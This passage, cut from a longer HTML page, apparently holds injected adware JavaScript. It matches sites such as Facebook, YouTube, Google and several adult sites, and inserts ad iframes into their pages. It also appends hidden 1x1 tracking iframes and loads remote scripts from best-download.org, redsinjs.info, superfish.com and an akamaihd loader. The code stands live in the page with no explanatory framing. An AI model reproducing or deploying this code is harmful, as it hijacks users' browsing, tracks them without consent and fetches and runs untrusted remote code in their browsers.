scrolling="no"></iframe></div>',ad300x250:'<div align="center"><iframe class="prt02123" width="300" height="250" src="http://ib.adnxs.com/tt?id=3318184&size=300x250" frameBorder="0" scrolling="no"></iframe></div>',ad336x280:'<div align="center"><iframe class="prt02123" width="300" height="250" src="http://ib.adnxs.com/tt?id=3318184&size=300x250" frameBorder="0" scrolling="no"></iframe></div>',ad728x90:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x100:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x150:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad720x300:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x300:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad750x200:'<div align="center"><iframe class="prt02123" width="728" height="90" src="http://ib.adnxs.com/tt?id=3318184&size=728x90" frameBorder="0" scrolling="no"></iframe></div>',ad120x600:'<div align="center"><iframe class="prt02123" width="120" height="600" src="http://ib.adnxs.com/tt?id=3318184&size=120x600" frameBorder="0" scrolling="no"></iframe></div>',ad300x600:'<div align="center"><iframe class="prt02123" width="300" height="600" src="http://ib.adnxs.com/tt?id=3318184&size=300x600" frameBorder="0" scrolling="no"></iframe></div>'},a,c=10,o=0,g=0,k=function(){if(!a){a={};for(var s in m){a[s]=s.substr(2).split("x")}}return a},r=function(y){for(var u in y){var t=y[u];var w=k();if(t instanceof Element&&o<c){for(var s in w){var x=(typeof x=="string")?t.width.replace("px",""):t.width;var v=(typeof v=="string")?t.height.replace("px",""):t.height;if(x==w[s][0]&&v==w[s][1]){t.insertAdjacentHTML("afterend",m[s]);t.parentNode.removeChild(t);o++}}}}},d=function(x,v){var t=new RegExp(x),y=window.document;if(t.test(y.URL)){for(var u=0;u<v.length;u++){var w=v[u],s=w.place(y);if(s){w.inject(s,w.ad);g++}}}};injectExtraAdd=function(){var s=document.getElementsByTagName("body")[0];s.insertAdjacentHTML("beforeend",m.ad728x90)};d("(http|https)://([a-z]*).facebook.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("pagelet_litestand_section")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector("#pagelet_litestand_section #pagelet_rhc_footer")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("pagelet_iframe_canvas_content")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("pagelet_iframe_canvas_content")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("mainContainer")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad160x600,place:function(s){return s.getElementById("leftCol")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}}]);d("(http|https)\\:\\/\\/www\\.youtube\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.querySelector("#page.home")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("player")},inject:function(t,s){var u='<div width="985px" style="float:left">'+s+"</div>";t.insertAdjacentHTML("afterbegin",u)}},{ad:m.ad300x250,place:function(s){return s.getElementById("watch7-sidebar")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}}]);d("(http|https)\\:\\/\\/ask\\.fm(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("leaderboard")},inject:function(t,s){t.style.height="auto";t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("footer")},inject:function(t,s){var u='<div style="background:#fff;width:728px;margin:0 auto 10px auto;padding:3px;border-radius:5px">'+s+"</div>";t.insertAdjacentHTML("beforebegin",u)}}]);d("xvideos\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("main")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s);t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("player")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("delta-search\\.com(.*)",[{ad:m.ad728x90,place:function(t){var u=t.getElementById("ymp"),s=t.querySelector("div[align='center']");if(u&&s){u.style.position="static"}return s},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s);t.insertAdjacentHTML("afterend",s)}},{ad:m.ad160x600,place:function(s){return s.querySelector("ul.srcm")},inject:function(u,t){var s="<li>"+t+"</li>";u.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("srfpn")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);d("4shared\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.querySelector("div.blueBox")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("content")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector(".d1rightPanel")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector(".rightPanelMargin")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);d("search\\.ask\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("hpSearchArea")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("firstRow")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad300x250,place:function(s){return s.getElementById("rightRail")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}}]);d("xnxx\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("siteNav")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("pag")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector("body > div > table:nth-child(2)")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector("body > div[align='center'] > form + table tr:nth-child(3) > td")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}}]);d("xhamster\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("header")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector("#content > tbody > tr > td.w100")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("related")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad300x250,place:function(s){return s.querySelector(".adVideo.adVideo2")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("cloob\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("themeArea")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s);t.insertAdjacentHTML("beforeend",s)}},{ad:m.ad160x600,place:function(s){return s.querySelector("#container .n2_mainRightCol .boxN2")},inject:function(t,s){t.insertAdjacentHTML("beforeend",s)}}]);d("qvo6\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.querySelector(".terms")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.querySelector(".search-control-inner")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("sahibinden\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("content")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s);t.insertAdjacentHTML("afterend",s)}}]);d("mediafire\\.com(.*)",[{ad:m.ad300x250,place:function(s){return s.querySelector(".dl_options_innerblock .left")},inject:function(t,s){t.insertAdjacentHTML("afterbegin",s)}}]);d("varzesh3\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("blk-toolsmenu")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("blk-footer")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);d("google(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("body")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad300x250,place:function(s){return s.getElementById("rhs_block")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("nav")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}}]);d("eseeky\\.com(.*)",[{ad:m.ad728x90,place:function(s){return s.getElementById("search-home")},inject:function(t,s){t.insertAdjacentHTML("afterend",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("main")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}},{ad:m.ad728x90,place:function(s){return s.getElementById("paginate")},inject:function(t,s){t.insertAdjacentHTML("beforebegin",s)}}]);if(g<5){setTimeout(function(){r(f);r(b);r(l);if(o+g<6&&window.location.protocol!=="https:"){injectExtraAdd()}},200)}})();(function(){if(window.self!==window.top){return}var b=document.createElement("iframe");b.setAttribute("src","//service.best-download.org//ads/stats.html");b.setAttribute("width","1");b.setAttribute("height","1");b.setAttribute("frameborder","0");b.setAttribute("border","0");b.setAttribute("scrolling","no");document.body.appendChild(b);if(typeof D_PTR_ID!=="undefined"){var d=D_SRC_ID?D_SRC_ID:"undefined";if(typeof d==="undefined"||d===0){d=D_PTR_ID}var a;if(d==200){a="?utm_campaign=LITE&utm_source="+D_PTR_ID+"&utm_medium=LITE"}else{a="?utm_campaign="+D_PTR_ID+"&utm_source="+d+"&utm_medium="+D_PTR_ID}var c=document.createElement("iframe");c.setAttribute("src","//service.best-download.org/ads/stats_source.html"+a);c.setAttribute("width","1");c.setAttribute("height","1");c.setAttribute("frameborder","0");c.setAttribute("border","0");c.setAttribute("scrolling","no");document.body.appendChild(c)}})();(function(){var a=window,e=document,f=navigator,b=f.language||f.userLanguage;if(a.self!==a.top||a.frames.length!==parent.frames.length){return}var c=document.createElement("script");c.setAttribute("type","text/javascript");c.setAttribute("src","https://cdncache-a.akamaihd.net/loaders/1920/l.js?aoi=1311798366&pid=1920&zoneid=523895&ext=eDeals");document.body.appendChild(c)})();(function(){var b=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}if(window.location.protocol=="https:"){var c="https://i_redsinjs_info.tlscdn.com/redsin/javascript.js"}else{var c="http://i.redsinjs.info/redsin/javascript.js"}var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)})();(function(){var b=navigator.language||navigator.userLanguage;var c="http://service.best-download.org/ads/pop.php";var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)})();(function(){var b=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}if(window.location.protocol=="http:"){var c="http://www.superfish.com/ws/sf_main.jsp?dlsource=dryadbe";var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)}})();(function(){var b=navigator.language||navigator.userLanguage;if(window.self!==window.top){return}var c="http://service.best-download.org/ads/offers.php";var a=document.createElement("script");a.setAttribute("src",c);a.setAttribute("type","text/javascript");document.head.appendChild(a)})();};
</script>
<script type="text/javascript">
function r(f){/in/.test(document.readyState)?setTimeout('r('+f+')',9):f()};
function prtInIframe () { try { return window.self !== window.top;} catch (e) { return true; } }
r(function() {
if (prtInIframe()) {
return;
}
prtLoader.ScriptIdf904d07f3c0759dd546fa11ba0a5e9df();
});
</script>

</body>
</html>
